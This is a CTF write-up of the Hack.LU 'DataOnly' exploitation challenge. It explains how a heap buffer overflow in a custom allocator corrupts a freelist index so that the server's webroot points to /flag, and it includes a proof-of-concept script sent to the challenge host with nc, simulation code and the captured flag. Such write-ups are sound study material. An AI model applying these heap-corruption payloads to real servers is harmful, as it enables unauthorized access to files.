Introduction
I participated in the Hack.LU CTF again this year, just like in 2013, but now together with the great Team HacknamStyle from KU Leuven. We ended up 24th out of 220 active teams, solving the DataOnly challenge (52 solves) among others:
DataOnly (Category: Exploiting)
Cthulhu is too chaotic and has lost the machine with his files. Cthulhu still has an old fileserver running on it though… Get the flag from /flag in the filesystem. Connect to cthulhu.fluxfingers.net:1509. Binaries.
First Impressions
It’s a small Linux x64 command line server daemon. The functionality is very limited: A visitor can change language in the console menu (German/English), and request a file to be downloaded from the hardcoded “./public/” webroot folder (omitted below):
One can see that the application also implements memory management itself, but besides that, there is not much to it.
Integer overflow
As we are required to request the flag file in the root of the filesystem, I looked at the DO_send_file(path) function first, where the path string is input data:
Our input is concatenated with the global webroot variable to form the path of the file that we eventually receive. We can see that there is a check for ‘..’ sequences in our path input to prevent path traversal vulnerabilities. However, when looking closely, the size_t unsigned long (0 – 4,294,967,295) path_len variable is cast to a long (-2,147,483,648 – 2,147,483,647) in the for loop that performs this check, indicating an integer overflow vulnerability. By sending a path larger than 2,147,483,647 characters and only then a “../../../../../../../../flag” sequence to get to the root, we could bypass the check. Right?
Wrong. The maximum path length for the DO_sys_open(full_path) call was found to be 4096 characters, otherwise the call would fail. This is due to the Linux path length limit (PATH_MAX). Plus, we would have to send more than 2 gigabytes, and the process only supports 10MB of memory (see below). Bummer.
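To make the failed idea concrete, here is a small Python sketch of the truncation. It assumes the loop bound ends up in a signed 32-bit value, as the ranges quoted above imply; the helper names are hypothetical and are not taken from the binary.

```python
import ctypes

PATH_MAX = 4096  # Linux path length limit, the reason the idea fails in practice


def as_signed_32(value):
    """Reinterpret the low 32 bits of value as a signed integer."""
    return ctypes.c_int32(value).value


def dotdot_check_iterations(path_len):
    """How often a loop bounded by the truncated length would run (assumed loop shape)."""
    return max(0, as_signed_32(path_len))


# A path of 2**31 bytes or more makes the bound negative, so the '..' check
# would never execute. Such a path is far longer than PATH_MAX, though.
print(as_signed_32(2**31), dotdot_check_iterations(2**31 + 28))
```

With these assumptions, any length up to 2,147,483,647 is checked in full, and the first length that skips the check is already about half a million times longer than what the open call accepts.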
Heap buffer overflow
Upon further investigation, a heap buffer overflow was found in the DO_readline(void) function:
This function allocates a buffer of static length 8191 and then keeps on writing bytes from STDIN to it until a newline is detected. DO_readline is used almost everywhere user input is gathered, so reaching the vulnerable code is not a problem. However, where are we overflowing to? The buffer address is received from the custom memory management implementation of DO_malloc(length).
Basically, the custom heap memory management implementation works as follows. The code allocates 10MB of heap space via a linux syscall, which is used as a base to allocate smaller chunks internally. Through the custom DO_malloc(length) function, chunks of 10 different sizes can be requested by other internal functions, with 16 as a minimum (index 0) and 8192 as a maximum size (index 9) – see CHUNK_SIZE_BY_IDX(index) definition below. All these allocated buffers will be taken from the 10MB chunk and thus be consecutive to one another to a certain extent, which implies that the only data that we can reliably overwrite via the buffer overflow is our own temporary input data…
However, 10 singly linked lists of free’d chunks are maintained, one for each chunk size. The head of each singly linked list is stored in a global array, namely malloc_freelist_heads[idx], where idx is the accompanying size index. So concretely, malloc_freelist_heads[9] will point to the head of the singly linked list of free chunks of 8192 bytes, and malloc_freelist_heads[0] will point to the head of the singly linked list of free chunks of 16 bytes.
Of course, these singly linked lists need to be populated when freeing and consumed when allocating. To know to which singly linked list a block must be added upon freeing, the index in the malloc_freelist_heads array is stored in the first byte of the allocated block. Hence, the maximum chunk size that an internal function can request is 8191, not 8192. When freeing a chunk in DO_free(ptr), the first byte of the chunk will be read and interpreted as index, and the address of the free’d chunk will be written to malloc_freelist_heads[idx]. The old address of malloc_freelist_heads[idx] will be written to the first 8 bytes of the free’d chunk first, as a pointer to the previous head of the list.
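The size classes and the one-byte header can be sketched as follows. The endpoints (16 bytes at index 0, 8192 bytes at index 9) come from the text; the doubling in between is an assumption that happens to fit both endpoints, and idx_for_request is a hypothetical helper name.

```python
NUM_SIZE_CLASSES = 10


def chunk_size_by_idx(idx):
    """Assumed size classes: 16, 32, 64, ..., 8192."""
    return 16 << idx


def idx_for_request(length):
    """Smallest size class that fits length bytes plus the one-byte index header."""
    needed = length + 1
    for idx in range(NUM_SIZE_CLASSES):
        if chunk_size_by_idx(idx) >= needed:
            return idx
    raise ValueError("request too large for any size class")


print([chunk_size_by_idx(i) for i in range(NUM_SIZE_CLASSES)])
print(idx_for_request(8191))  # the DO_readline buffer lands in the largest class
```

Under this model a request of 8192 bytes no longer fits, which matches the observation that 8191 is the largest size an internal function can ask for.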
Chaining
This gives an attacker opportunities. Overwriting our own input data would not be very helpful, as the DO_send_file(path) function only uses temporary input that is free’d immediately afterwards, without possibilities to overwrite it with e.g. “../../../flag“. However, if an attacker is able to overwrite the first byte of an allocated chunk which gets free’d later on, he/she is able to write the address of that chunk to any of malloc_freelist_heads[0-255]. As seen previously, only 10 pointer spots were allocated in the malloc_freelist_heads array, which means an attacker could now overwrite other global variables behind it. Enter the global webroot variable (see screenshot above). A GDB -tui session showed that this variable is situated at address &malloc_freelist_heads[12]:
We now have all ingredients to chain everything into a working exploit.
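The central ingredient, the unvalidated index in DO_free, can be modelled in isolation. This is only a sketch: the globals are represented as a Python list, slots 10 and 11 are globals of unknown purpose, and 0x400000 is a made-up placeholder for the address of the “./public/” string. The chunk address is the one observed later in this writeup.

```python
NUM_HEADS = 10
WEBROOT_SLOT = 12  # webroot was observed at &malloc_freelist_heads[12]


def make_globals(webroot_ptr):
    """Ten freelist heads, two unknown globals, then the webroot pointer."""
    return [0] * NUM_HEADS + [0, 0] + [webroot_ptr]


def do_free(slots, chunk_addr, index_byte):
    """Push chunk_addr onto the list selected by index_byte, without validating it."""
    old_head = slots[index_byte]
    slots[index_byte] = chunk_addr
    return old_head  # the allocator stores this in the first 8 bytes of the chunk


slots = make_globals(0x400000)  # placeholder address, not from the binary
old = do_free(slots, 0x7fffeda19000, 12)
print(hex(slots[WEBROOT_SLOT]), hex(old))
```

After the call, the webroot slot holds the chunk address and the chunk itself would hold the old webroot pointer, so whoever controls the chunk contents controls the webroot string.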
Proof-of-Concept
    import os

    f = open("commands.txt", "w")
    f.write("language\n")
    f.write("random\n")
    f.write("A"*8191 + "B"*8192 + chr(12) + "\n")
    f.write("language\n")
    f.write("newrandom\n")
    f.write("A"*8191 + "B"*8192 + "/flag\n")
    f.write("get\n")
    f.write("\n")
    f.close()

    os.system("nc cthulhu.fluxfingers.net 1509 < commands.txt")
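As a reading aid, the same command stream can be built in memory with the magic numbers named. This is a sketch that produces the bytes the script above writes to commands.txt; the constant and function names are hypothetical, and nothing is sent over the network.

```python
CHUNK_SIZE = 8192
FIRST_CHUNK_DATA = CHUNK_SIZE - 1  # usable bytes after the one-byte size index
WEBROOT_SLOT = 12                  # webroot sits at &malloc_freelist_heads[12]


def overflow_line(tail):
    """Fill the first 8192-byte chunk, cover the second one, then place tail behind it."""
    return b"A" * FIRST_CHUNK_DATA + b"B" * CHUNK_SIZE + tail + b"\n"


def build_commands():
    return b"".join([
        b"language\n", b"random\n",
        overflow_line(bytes([WEBROOT_SLOT])),  # corrupt the size index of the next chunk
        b"language\n", b"newrandom\n",
        overflow_line(b"/flag"),               # overwrite the chunk webroot points to
        b"get\n", b"\n",
    ])


print(len(build_commands()))
```

The steps below explain why each line has the effect noted in the comments.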
1) language
2) random
In order to control a write to variable malloc_freelist_heads[12] (aka webroot), we first need to overwrite the first byte of an allocated buffer before it is freed again. The most convenient way identified was to first use the language command to store a language string in an allocated chunk which is only freed after a second language command. By first sending the language command followed by the string random, we get the following memory layout:
[idx=9 | “language”] [idx=9 | “random”] [idx=0 | “random”] [unallocated memory]
—C1: 8192 bytes– –C2: 8192 bytes– —C3: 16 bytes— —-Almost 10MB—-
The language command is received first and allocated in the first chunk C1 of 8192 bytes via DO_readline. Then, the random string is received and stored in a temporary chunk C2 of 8192 bytes, also via DO_readline. Finally, a third chunk C3 of only 16 bytes is allocated via DO_malloc(len) and the value of C2 is copied over. Hereafter, the remainder of the 10MB heap base remains.
However, both 8192-byte chunks are only temporary and are immediately free’d again before the next command is processed, first C2 and then C1. This results in the following situation before processing the next command:
malloc_freelist_heads[9] = C1
↓
[ C2 | free’d ] [0x0 | free’d ] [idx=0 | “random”] [unallocated memory]
–8192 bytes– –8192 bytes– —–16 bytes—— —-Almost 10MB—-
As visualized, malloc_freelist_heads[9] now holds the address of C1, as this was the last 8192-byte chunk that was freed. In turn, C1 points to C2, which is also a freed buffer of 8192 bytes. C2 is the end of the singly linked list and points to address 0x0. No other singly linked list in malloc_freelist_heads[0-8] has been populated at this point.
3) “A” * 8191 +”B” * 8192 + chr(12)
Now, we actually exploit the buffer overflow in DO_readline. We will receive C1 from DO_malloc, as it is the head of the singly linked list at malloc_freelist_heads[9], and end up overwriting the first byte of C3, which is still allocated. This is the situation after the buffer overflow occurred:
malloc_freelist_heads[9] = C2
↓
[ idx=9 | A * 8191 ] [ B * 8192 ] [idx=12 | “random”] [unallocated memory]
—C1: 8192 bytes– –C2: 8192 — —C3: 16 bytes— —-Almost 10MB—-
4) language
5) newrandom
Here, we trigger a DO_free(C3) by supplying a new language string to be stored. Because the first byte of C3 is now 12, the free writes the address of C3 to malloc_freelist_heads[12], which also happens to be the webroot variable (C3 is at address 0x7fffeda19000 in this case):
We now have the following memory layout right before accepting the next command:
malloc_freelist_heads[9] = C1 webroot = C3
↓ ↓
[ C2 | free’d ] [0x0 | free’d ] [address of string “./public/”] [unallocated memory]
–8192 bytes– –8192 bytes– —–16 bytes—— —-Almost 10MB—-
As we can see, webroot is now pointing to C3, which in its turn is free’d and holding the old singly linked list head value of malloc_freelist_heads[12], which concretely is the address of the old webroot string “./public/”.
6) “A” * 8191 + “B” * 8192 + “/flag”
We exploit the buffer overflow in DO_readline a second time in a very similar way. We will receive C1 from DO_malloc, as it is the head of the singly linked list at malloc_freelist_heads[9], and end up overwriting C3 with the string “/flag”. This is the situation after the buffer overflow occurred:
malloc_freelist_heads[9] = C2 webroot = C3
↓ ↓
[ idx=9 | A * 8191 ] [B * 8192 ] [ “/flag” ] [unallocated memory]
—C1: 8192 bytes– –C2: 8192– -16 bytes- —-Almost 10MB—-
7) get
8) “”
We can *finally* perform the get function with an empty parameter, as the webroot is already pointing directly to our /flag:
    # nc cthulhu.fluxfingers.net 1509 < commands.txt
    bad command - try sending "help" for help
    bad command - try sending "help" for help
    command understood, please send a path
    flag{cthulhu_likes_custom_mallocators}
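The whole chain can also be replayed offline against a toy model of the server. This is a simplified sketch and not a reimplementation of the binary: the heap is a 64KB bytearray instead of 10MB, addresses are offsets into it, size classes are assumed to double from 16 to 8192, and ToyServer, handle and PUBLIC_ADDR are hypothetical names.

```python
import struct

NULL = 0
WEBROOT_SLOT = 12  # webroot sits at &malloc_freelist_heads[12]
PUBLIC_ADDR = 16   # hypothetical address of the "./public/" string


def chunk_size_by_idx(idx):
    return 16 << idx  # assumed size classes: 16, 32, ..., 8192


class ToyServer:
    def __init__(self):
        self.mem = bytearray(64 * 1024)  # small stand-in for the 10MB heap
        self.mem[PUBLIC_ADDR:PUBLIC_ADDR + 10] = b"./public/\0"
        self.top = 0x100                 # next never-used heap address
        # Slots 0-9: freelist heads, 10-11: unknown globals, 12: webroot.
        self.slots = [NULL] * 12 + [PUBLIC_ADDR]
        self.language = NULL

    def malloc(self, length):
        idx = next(i for i in range(10) if chunk_size_by_idx(i) >= length + 1)
        addr = self.slots[idx]
        if addr != NULL:                 # reuse the head of the freelist
            self.slots[idx] = struct.unpack_from("<Q", self.mem, addr)[0]
        else:                            # carve a fresh chunk from the heap
            addr = self.top
            self.top += chunk_size_by_idx(idx)
        self.mem[addr] = idx             # size index lives in the first byte
        return addr + 1

    def free(self, ptr):
        addr = ptr - 1
        idx = self.mem[addr]             # never validated against the 10 real lists
        struct.pack_into("<Q", self.mem, addr, self.slots[idx])
        self.slots[idx] = addr

    def readline(self, line):
        ptr = self.malloc(8191)
        data = line + b"\0"
        self.mem[ptr:ptr + len(data)] = data  # no bounds check: the overflow
        return ptr

    def cstring(self, addr):
        return bytes(self.mem[addr:self.mem.index(0, addr)])

    def handle(self, command, argument=b""):
        c1 = self.readline(command)
        cmd, result = self.cstring(c1), None
        if cmd in (b"language", b"get"):
            c2 = self.readline(argument)
            value = self.cstring(c2)
            if cmd == b"language":
                new = self.malloc(len(value) + 1)
                self.mem[new:new + len(value) + 1] = value + b"\0"
                if self.language != NULL:
                    self.free(self.language)
                self.language = new
            else:                        # "get": path the server would open
                result = self.cstring(self.slots[WEBROOT_SLOT]) + value
            self.free(c2)
        self.free(c1)                    # unknown input is simply discarded
        return result


def replay():
    srv = ToyServer()
    overflow = b"A" * 8191 + b"B" * 8192
    srv.handle(b"language", b"random")
    srv.handle(overflow + bytes([12]))   # C3's size index becomes 12
    srv.handle(b"language", b"newrandom")  # frees C3: webroot now points at C3
    srv.handle(overflow + b"/flag")      # C3 now starts with "/flag"
    return srv.handle(b"get", b"")


print(replay())
```

In this model an untouched server resolves a get for “x” to “./public/x”, while the replayed chain resolves the empty path to “/flag”.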
Although not necessary, since ASLR was not enabled for this binary, the exploit would have worked against ASLR-enabled binaries as well, since it relies only on reliable, relative offset overwrites and never needs an absolute address.
Conclusion
Cool & fun exploitation challenge! Lessons learned: Don’t ever implement low-level memory management yourself.
My highly similar writeup: https://0x90r00t.com/2016/10/20/hack-lu-2016-exploit-200-dataonly-write-up/